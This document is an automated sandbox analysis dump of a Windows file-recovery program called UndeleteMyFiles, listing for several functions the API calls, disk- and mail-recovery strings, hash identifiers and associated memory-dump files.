Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3573ccfb5babced38287a100274d3336e753dbc88e40550e0b5dbfc73facb0d
Instruction ID: bfb4079ed809539881000caf7536bd86c3eff1603f2b6cbb782dd89d3f49ede5
Opcode Fuzzy Hash: e3573ccfb5babced38287a100274d3336e753dbc88e40550e0b5dbfc73facb0d
Instruction Fuzzy Hash: 2E314476D003308FD7C9DF76ED8AC6A3662FB80310385853EE442C75A9DF782902869C

Function 0043EF20 Relevance: 94.9, APIs: 30, Strings: 24, Instructions: 448
sleepstringsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNEL32(?,?), ref: 0043EFAE
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000200), ref: 0043EFFE
wsprintfW.USER32 ref: 0043F024
MessageBoxW.USER32(?,?,UndeleteMyFiles,00000010), ref: 0043F04C
WaitForSingleObject.KERNEL32(?,00000000), ref: 0043F6F3
Sleep.KERNEL32(00000064), ref: 0043F6FF

Strings

UndeleteMyFiles, xrefs: 0043F322
Cannot read boot sector of disk %s, xrefs: 0043F524
UndeleteMyFiles, xrefs: 0043F545
Unsuported file-system type on disk %s, xrefs: 0043F578
UndeleteMyFiles, xrefs: 0043F039
Cannot read volume info on disk %s, xrefs: 0043F5CC
Cannot read from disk %s, xrefs: 0043F4CF
No media found on drive %s, xrefs: 0043F018
UndeleteMyFiles, xrefs: 0043F279
Cannot read from disk %s, xrefs: 0043F204
UndeleteMyFiles, xrefs: 0043F5ED
UndeleteMyFiles, xrefs: 0043F0E6
Unsuported file-system type on disk %s, xrefs: 0043F2AC
UndeleteMyFiles, xrefs: 0043F599
UndeleteMyFiles, xrefs: 0043F4F0
Wrong disk path %s, xrefs: 0043F621
Unsuported file system type on drive %s, xrefs: 0043F0C5
Cannot read boot sector of disk %s, xrefs: 0043F258
NTFS, xrefs: 0043F068
FAT, xrefs: 0043F091
UndeleteMyFiles, xrefs: 0043F2CD
UndeleteMyFiles, xrefs: 0043F642
Cannot read mft on disk %s, xrefs: 0043F301
UndeleteMyFiles, xrefs: 0043F225

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: InformationMessageObjectSingleSleepVolumeWaitlstrcmpwsprintf
String ID: Cannot read boot sector of disk %s$Cannot read boot sector of disk %s$Cannot read from disk %s$Cannot read from disk %s$Cannot read mft on disk %s$Cannot read volume info on disk %s$FAT$NTFS$No media found on drive %s$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$Unsuported file system type on drive %s$Unsuported file-system type on disk %s$Unsuported file-system type on disk %s$Wrong disk path %s
API String ID: 2208763520-996551705
Opcode ID: f5f0f48b70fd5f52ee5c296762118886c2a6b86390e1fa9df839a907d5a17ba8
Instruction ID: b222bc8b31a28fe6aa3250038f95b3c0c939a73a67916b3437a811d1efe6a307
Opcode Fuzzy Hash: f5f0f48b70fd5f52ee5c296762118886c2a6b86390e1fa9df839a907d5a17ba8
Instruction Fuzzy Hash: FB22BFB4900204EFD714CF54ED89F9973B5BB48304F1086BAE509973A1E7B4AA89CF1D

Function 0044A470 Relevance: 73.9, APIs: 33, Strings: 9, Instructions: 422
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0044AD80: lstrlenW.KERNEL32(00000000,0044A4B7), ref: 0044ADCB
Part of subcall function 0044AD80: SetLastError.KERNEL32(24000002,0044A4B7), ref: 0044ADDF

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,87E7D08C), ref: 0044A4F5

Strings

X-Mozilla-Status: , xrefs: 0044A6AE
From - , xrefs: 0044A648
From: , xrefs: 0044A923
Subject: , xrefs: 0044A75D
From - , xrefs: 0044AA36
From - , xrefs: 0044AA86
%d_%d_%d_%d_%d, xrefs: 0044A593
8009, xrefs: 0044A70F
To: , xrefs: 0044A86B

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CreateErrorFileLastlstrlen
String ID: From - $From - $From: $Subject: $To: $X-Mozilla-Status: $%d_%d_%d_%d_%d$8009$From -
API String ID: 2382760065-848944010
Opcode ID: 5aaa0530ba97ad05eb63b2f0c7aa02dc6b9fb3ac4a103ddfac37c596bbc861e9
Instruction ID: c9ebbdd7b045b04df0d734e15ce5d6044be51cef64b6f15f7183baad29a1f6a7
Opcode Fuzzy Hash: 5aaa0530ba97ad05eb63b2f0c7aa02dc6b9fb3ac4a103ddfac37c596bbc861e9
Instruction Fuzzy Hash: 9E126AB5D40219DFDB24DB64CC48BAEB7B5BB48304F0085EAE909B7341E7749A81CF56

Function 0044AF20 Relevance: 73.7, APIs: 17, Strings: 25, Instructions: 233
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeThread.KERNEL32(?,00000000), ref: 0044AF58
CloseHandle.KERNEL32(?), ref: 0044AF7D

Part of subcall function 00403DE0: KillTimer.USER32(?,?), ref: 00403DF2

Part of subcall function 0040D055: EndDialog.USER32(?,?), ref: 0040D074

MessageBoxW.USER32(00000000,Process completed succesfully,UndeleteMyFiles,00000040), ref: 0044AFCA
FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000065,00000000,00000000), ref: 0044B269
MessageBoxW.USER32(00000000,00000065,UndeleteMyFiles,00000010), ref: 0044B28D
LocalFree.KERNEL32(00000065), ref: 0044B297

Part of subcall function 00401FA0: GetParent.USER32(?), ref: 00401FAE

wsprintfW.USER32 ref: 0044B2C7

Strings

UndeleteMyFiles, xrefs: 0044B0E2
UndeleteMyFiles, xrefs: 0044B208
Process completed succesfully, xrefs: 0044AFB2
UndeleteMyFiles, xrefs: 0044B1B4
Error creating image:Unable to move file pointer, xrefs: 0044B165
Error creating image:Unable to open source file, xrefs: 0044B0E7
Error creating image:Input/output error, please check free space on destination disk., xrefs: 0044B18F
UndeleteMyFiles, xrefs: 0044AFAD
Error creating image:User cancelled the operation, xrefs: 0044B1B9
Error creating image:Cannot create a file bigger than 4 GB on FAT partition., xrefs: 0044B20D
Error creating image:Destination disk size is lower than image size., xrefs: 0044B234
%s progress %d%%, xrefs: 0044B2BB
UndeleteMyFiles, xrefs: 0044B22F
UndeleteMyFiles, xrefs: 0044B0B8
Error creating image:bad parameter passed to function, xrefs: 0044B0BD
Error creating image:Unable to create events, xrefs: 0044B13B
UndeleteMyFiles, xrefs: 0044B18A
UndeleteMyFiles, xrefs: 0044B136
UndeleteMyFiles, xrefs: 0044B1DE
UndeleteMyFiles, xrefs: 0044B10C
Error creating image:Unable to open destination file, xrefs: 0044B111
Error creating image:Image creation cannot run because the volume is in use by another process., xrefs: 0044B1E3
UndeleteMyFiles, xrefs: 0044B271
e, xrefs: 0044AF39
UndeleteMyFiles, xrefs: 0044B160

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Message$CloseCodeDialogExitFormatFreeHandleKillLocalParentThreadTimerwsprintf
String ID: %s progress %d%%$Error creating image:Cannot create a file bigger than 4 GB on FAT partition.$Error creating image:Destination disk size is lower than image size.$Error creating image:Image creation cannot run because the volume is in use by another process.$Error creating image:Input/output error, please check free space on destination disk.$Error creating image:Unable to create events$Error creating image:Unable to move file pointer$Error creating image:Unable to open destination file$Error creating image:Unable to open source file$Error creating image:User cancelled the operation$Error creating image:bad parameter passed to function$Process completed succesfully$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$UndeleteMyFiles$e
API String ID: 1918538503-1263571133
Opcode ID: 05f19bb46676a24ece891ac3f267a7369f008d47b1a162fc57418cf0d24af058
Instruction ID: c62c83b97715d94149ade3005fb02b758b50434ddf8757cc05e97471502f8d50
Opcode Fuzzy Hash: 05f19bb46676a24ece891ac3f267a7369f008d47b1a162fc57418cf0d24af058
Instruction Fuzzy Hash: 0F917470A80208ABEB14AB61CC5DBDE7375AB44744F1044AEB10A761E1DFBC9D81DF8D

Function 00450840 Relevance: 66.8, APIs: 28, Strings: 10, Instructions: 299
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00413DBC: __EH_prolog3.LIBCMT ref: 00413DC3
Part of subcall function 00413DBC: GetWindowTextW.USER32(?,?,?), ref: 00413DD9

PathFileExistsW.SHLWAPI(?,?,00008000), ref: 00450887
_memset.LIBCMT ref: 004508B0
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 004508D4
SetFilePointer.KERNEL32(?,00000007,00000000,00000000), ref: 004508FB
CloseHandle.KERNEL32(?), ref: 0045090D
ReadFile.KERNEL32(?,?,00000007,?,00000000), ref: 00450941
CloseHandle.KERNEL32(?), ref: 0045095B

Strings

SCANPST.EXE, xrefs: 00450AB6
Error, xrefs: 00450AEE
The specified file cannot be recovered., xrefs: 00450A23
D, xrefs: 00450B31
Error, xrefs: 00450893
Error, xrefs: 00450A1E
The specified file does not exist., xrefs: 00450898
SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls, xrefs: 004509E6
The specified file cannot be recovered., xrefs: 00450AF3
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SharedDlls, xrefs: 004509FE

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: File$CloseHandle$CreateExistsH_prolog3PathPointerReadTextWindow_memset
String ID: D$Error$Error$Error$SCANPST.EXE$SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SharedDlls$The specified file cannot be recovered.$The specified file cannot be recovered.$The specified file does not exist.
API String ID: 3029586681-3581312652
Opcode ID: 76813065948b2c67fd4bcc63bb59a7eca9c9804e2056d531769921ac09d4a03f
Instruction ID: 2e44ee11a3e7edcf9f172a39a4911159a643cec77e58e87aa88279d4df324cd9
Opcode Fuzzy Hash: 76813065948b2c67fd4bcc63bb59a7eca9c9804e2056d531769921ac09d4a03f
Instruction Fuzzy Hash: CEC1A474A40218DBDB25CB50CC45FEA7375BB08705F1045AAF689AB2C1D7F8AAC4CF59

Function 004414A0 Relevance: 46.0, APIs: 13, Strings: 13, Instructions: 462windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,How the selected files should be recovered?Choose YES if you want files to be recovered directly at the specified location.Choo,UndeleteMyFiles,00000003), ref: 004414EA

Strings

Cannot access the disk., xrefs: 004416CC
On %sselected to recover: %d (%d%%)recovered:%d (%d%%)recovered and removed:%d (%d%%)not recovered:%d (%d%, xrefs: 00441D7E
UndeleteMyFiles, xrefs: 00441DA1
Cannot recover files. The destination disk is full or read only., xrefs: 00441628
How the selected files should be recovered?Choose YES if you want files to be recovered directly at the specified location.Choo, xrefs: 004414DF
UndeleteMyFiles, xrefs: 00441623
Cannot recover files because of the lack of memory., xrefs: 0044163E
UndeleteMyFiles, xrefs: 004416C7
Total files selected to recover:%dTotal recovered:%d (%d%%)Total unrecovered:%d (%d%%), xrefs: 00441872
UndeleteMyFiles, xrefs: 00441639
UndeleteMyFiles, xrefs: 004414DA
h#I, xrefs: 00441505
d, xrefs: 00441A98

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
